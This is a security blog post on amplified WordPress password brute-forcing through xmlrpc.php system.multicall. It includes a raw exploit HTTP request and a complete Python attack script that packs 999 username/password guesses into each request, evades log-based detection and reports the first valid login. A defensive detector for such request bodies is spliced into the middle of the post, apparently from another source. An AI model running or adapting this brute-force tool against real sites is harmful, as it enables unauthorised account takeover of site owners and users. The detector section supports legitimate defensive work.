Brute-forcing WordPress through xmlrpc (many username/password pairs in a single request), with exp


Oct 15 2015



Account brute forcing through xmlrpc.php. Original article: https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html

Only a POC is given here.


Earlier articles sent one username/password pair per request. This one sends many pairs per request: putting a thousand pairs into a single request is no problem, and the access log ends up with only a few xmlrpc entries.

Following the official documentation, the EXP request looks like this:


POST /wp/wordpress//xmlrpc.php HTTP/1.1
Host: weisuo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; c4bbage@weisuo.org)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1196

<?xml version="1.0"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value>
              <struct>
                <member>
                  <name>methodName</name>
                  <value><string>wp.getCategories</string></value>
                </member>
                <member>
                  <name>params</name>
                  <value>
                    <array>
                      <data>
                        <value><string>1</string></value>
                        <value><string>c4bbage</string></value>
                        <value><string>11</string></value>
                      </data>
                    </array>
                  </value>
                </member>
              </struct>
            </value>
            <value>
              <struct>
                <member>
                  <name>methodName</name>
                  <value><string>wp.getCategories</string></value>
                </member>
                <member>
                  <name>params</name>
                  <value>
                    <array>
                      <data>
                        <value><string>1</string></value>
                        <value><string>c4bbage</string></value>
                        <value><string>123456zz</string></value>
                      </data>
                    </array>
                  </value>
                </member>
              </struct>
            </value>
          </data>
        </array>
      </value>
    </param>
  </params>
</methodCall>

weibo:http://weibo.com/s4turnus 

# Reference: https://code.google.com/p/gi-torrent/wiki/system_multicall
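Because every guess in the request above travels inside one POST body, anything that counts requests (access-log review, per-IP rate limits on wp-login.php or xmlrpc.php) sees a single hit and misses the guessing entirely; a defensive check has to open the body. The block below is an added example for this post, not code from the post or from WordPress: it parses an XML-RPC body with the standard library, and when the outer method is system.multicall it counts the nested calls and the distinct username/password pairs carried by wp.* calls (in WordPress every wp.* method takes blog_id, username, password as its first three params), blocking a request that batches more than one credential pair or more than a configurable number of calls. The multicall_body builder, the MAX_CALLS_PER_REQUEST and MAX_BODY_BYTES thresholds and the sample credentials are constructed for the example; wp.getPosts is a real WordPress method used only to build a benign batch. The blunt alternative on the WordPress side is to drop system.multicall through the xmlrpc_methods filter.

```python
"""Body-level check for system.multicall credential guessing (added example)."""
import xml.etree.ElementTree as ET

MAX_CALLS_PER_REQUEST = 10   # policy threshold; an assumption for this example
MAX_BODY_BYTES = 64 * 1024   # cheap size guard before parsing untrusted XML


def _member_value(struct, name):
    """Return the <value> element of the <member> named `name` in a <struct>, or None."""
    for member in struct.findall("member"):
        if (member.findtext("name") or "").strip() == name:
            return member.find("value")
    return None


def _strings(value):
    """Return the <string> items of an <array> value as plain Python strings."""
    if value is None:
        return []
    return [(s.text or "").strip() for s in value.findall("array/data/value/string")]


def parse_multicall(body):
    """Return (outer_method, inner_calls); each inner call is (method, [string params])."""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    outer = (root.findtext("methodName") or "").strip()
    inner = []
    if outer == "system.multicall":
        # system.multicall takes a single array of {methodName, params} structs
        for struct in root.findall("params/param/value/array/data/value/struct"):
            name_el = _member_value(struct, "methodName")
            method = (name_el.findtext("string") if name_el is not None else "") or ""
            inner.append((method.strip(), _strings(_member_value(struct, "params"))))
    return outer, inner


def assess(body, max_calls=MAX_CALLS_PER_REQUEST):
    """Classify a body: {'verdict': 'allow'|'block', 'reason', 'calls', 'credentials'}."""
    if len(body) > MAX_BODY_BYTES:
        return {"verdict": "block", "reason": "oversized body", "calls": 0, "credentials": 0}
    try:
        outer, inner = parse_multicall(body)
    except (ET.ParseError, ValueError) as exc:
        return {"verdict": "block", "reason": "malformed: %s" % exc, "calls": 0, "credentials": 0}
    # Every wp.* method in WordPress authenticates with params[1]=username, params[2]=password.
    creds = {(p[1], p[2]) for m, p in inner if m.startswith("wp.") and len(p) >= 3}
    result = {"verdict": "allow", "reason": "", "calls": len(inner), "credentials": len(creds)}
    if outer != "system.multicall":
        return result
    if len(inner) > max_calls:
        result.update(verdict="block", reason="%d calls in one multicall" % len(inner))
    elif len(creds) > 1:
        # A legitimate client batches calls under one credential set; several sets means guessing.
        result.update(verdict="block", reason="%d distinct credential pairs" % len(creds))
    return result


def multicall_body(calls):
    """Build a constructed system.multicall body from [(method, [string params]), ...]."""
    call_xml = "".join(
        "<value><struct>"
        "<member><name>methodName</name><value><string>%s</string></value></member>"
        "<member><name>params</name><value><array><data>%s</data></array></value></member>"
        "</struct></value>" % (m, "".join("<value><string>%s</string></value>" % p for p in ps))
        for m, ps in calls)
    return ('<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
            '<params><param><value><array><data>%s</data></array></value></param></params>'
            '</methodCall>' % call_xml)


# Constructed samples: the shape of the post's request (two password guesses for one
# user in a single multicall) versus a legitimate batch that reuses one credential set.
GUESSING_BODY = multicall_body([
    ("wp.getCategories", ["1", "admin", "password1"]),
    ("wp.getCategories", ["1", "admin", "password2"]),
])
BATCH_BODY = multicall_body([
    ("wp.getCategories", ["1", "editor", "correct-horse"]),
    ("wp.getPosts", ["1", "editor", "correct-horse"]),
])

if __name__ == "__main__":
    for label, body in (("guessing", GUESSING_BODY), ("batch", BATCH_BODY)):
        print(label, assess(body))
```

The distinct-credential rule is the sharper of the two: a batch of ten calls under one login is normal client behaviour, while two different passwords for the same user in one request has no legitimate reading. The call-count ceiling is still worth keeping, because a body that wraps hundreds of calls is an amplification problem for the server even when every call carries the same credentials.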

Exploit script

# coding=utf-8
# author:c4bbage@qq.com
# weibo:http://weibo.com/s4turnus

import httplib
import urlparse
import argparse


def post(host, pl, port=80, path='/xmlrpc.php'):
    # Send one system.multicall request; pl is the already-built list of
    # <value><struct>...</struct></value> call entries.
    postHead = {"Host": host,
                "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0; c4bbage@weisuo",
                "X-Forwarded-For": host,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Connection': 'keep-alive'}
    postcontent = '''<?xml version="1.0"?>
        <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>[pl]     </data>
        </array>   </value>    </param>    </params>    </methodCall>
        '''
    conn = httplib.HTTPConnection(host.split(":")[0], int(port))
    conn.request('POST', path, body=postcontent.replace('[pl]', pl), headers=postHead)
    page = conn.getresponse()
    return page.read()


def main():
    parser = argparse.ArgumentParser(
        description='wordpress brute force tool. Packs many username/password pairs into one '
                    'request (a thousand per request is fine), so xmlrpc leaves only a few log lines.'
                    '\nby c4bbage http://weibo.com/s4turnus')

    parser.add_argument('-t', action="store", dest="url", required=True,
                        help='exp: -t http://weisuo.org/xmlrpc.php')
    parser.add_argument('-u', action="store", dest="userfile", required=True,
                        help='exp: -u username.txt', type=argparse.FileType('r'))
    parser.add_argument('-p', action="store", dest="pwdfile", required=True,
                        help='exp: -p password.txt', type=argparse.FileType('r'))

    args = parser.parse_args()
    url = urlparse.urlparse(args.url)
    userfile = args.userfile
    pwdfile = args.pwdfile
    # netloc is "host" or "host:port"; str.index() would raise when no port is given
    if ':' in url.netloc:
        urlport = int(url.netloc.split(":")[1])
    else:
        urlport = 80
    # 999 username/password pairs per request
    t = 999
    users = userfile.readlines()
    pwds = pwdfile.readlines()
    # one wp.getCategories call entry; params are [blog_id, username, password]
    pl = '''
    <value><struct><member>
        <name>methodName</name>
            <value><string>wp.getCategories</string></value>
            </member>
        <member>
        <name>params</name>
        <value><array><data>
            <value><string>1</string></value>
            <value><string>[username]</string></value>
            <value><string>[pwd]</string></value>
        </data></array></value>
    </member></struct></value>'''

    up = [[u.strip(), p.strip()] for u in users for p in pwds]
    # send the pairs in chunks of t, one system.multicall request per chunk
    for s in range(0, len(up), t):
        chunk = up[s:s + t]
        apl = ''.join(pl.replace('[username]', a[0]).replace('[pwd]', a[1]) for a in chunk)
        res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)
        # extract the result: a failed login comes back as a single fault struct, while a
        # successful wp.getCategories returns category structs containing categoryDescription,
        # so the position of the first matching struct is the index of the working pair
        if "categoryDescription" in res:
            for rr, r in enumerate(res.split("</struct></value>")):
                if "categoryDescription" in r:
                    print chunk[rr]
                    # exit after the first success
                    return


if __name__ == '__main__':
    main()


Tags: xmlrpc vulnerability

Copyright notice: unless otherwise stated, this article is original work by mOon; please keep the source link when reposting.

